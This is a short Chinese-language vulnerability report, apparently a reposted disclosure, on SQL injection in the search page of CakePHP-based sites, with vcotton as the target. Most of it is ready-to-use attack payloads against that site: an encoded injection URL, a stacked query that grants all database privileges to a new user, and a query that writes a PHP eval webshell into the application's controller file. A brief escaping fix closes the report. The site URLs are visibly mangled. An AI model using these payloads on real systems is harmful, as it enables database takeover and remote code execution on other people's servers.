http://HdhCmsTestvcotton测试数据/searchs?keywords=%25%27%29+and+1%3D1+and+1+like%28%27%251 cakephp多数框架版本架设的应用不带搜索的注入过滤 这里的1=1可以任意换。 然后你可以 %') and 1=1;grant all privileges on *.* to 'zimengqian'@'%' identified by '12345678';# 你可以 %') and 1=(select '<?php eval($_POST[c])?>' into outfile '/data/web_root/abram.intra.vcotton测试数据/www/current/app/app_controller.php');#(悲催的是无写权限) 漏洞 证明:http://HdhCmsTest vc otton测试数据/searchs?keywords=%25%27%29+and+1%3D1+and+1+like%28%27%251 http://HdhCmsTestvcotton测试数据/searchs?keywords=%25%27%29+and+1%3D2+and+1+like%28%27%251 修复方案:HdhCmsTest2cto测试数据 自己在适当位置addslashes 并且 用str_replace给%和_加斜杠 或者修改 core/libs/controller/components/request_handler.php 以适应全部(也许2.0已经修改了这个bug) 作者 紫梦芊
查看更多关于维棉等多个CAKEPHP框架站搜索处存在SQL注入攻击及的详细内容...